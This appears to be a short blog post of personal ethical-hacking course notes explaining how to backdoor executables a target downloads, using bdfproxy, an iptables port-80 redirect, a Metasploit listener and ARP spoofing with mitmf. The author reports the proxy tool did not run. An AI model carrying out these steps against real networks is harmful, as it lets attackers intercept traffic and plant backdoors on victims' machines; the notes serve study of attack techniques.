Ethical Hacking - GAINING ACCESS(13)


Backdoor delivery method2 - backdooring exe downloads

  • Backdoor any exe the target downloads.
  • We need to be in the middle of the connection.


Install bdfproxy following the guide on the website - - No longer update or support.


1. Set IP address in config.

leafpad /etc/bdfproxy/bdfproxy.cfg

Change the proxyMode to transparent, so the target machine has Internet connection.

Change HOST IP address in WindowsIntel section, because our target is Windows machines.


2. Start dbfproxy



 I met a problem to run bdf_proxy, and the offical website( does NOT SUPPORT this program now.

I will continue to try to solve this problem later.


3. Redirect traffic to bafoxy.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


4. Start listening for connections

msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc


5. Start arp spoofing.

mitmf --arp --spoof --gateway [GATEWAY IP] --target [Target IP] -i [interface] 


6. When done reset IP tables rules.



posted @ 2020-01-05 13:04  晨风_Eric  阅读(105)  评论(0编辑  收藏  举报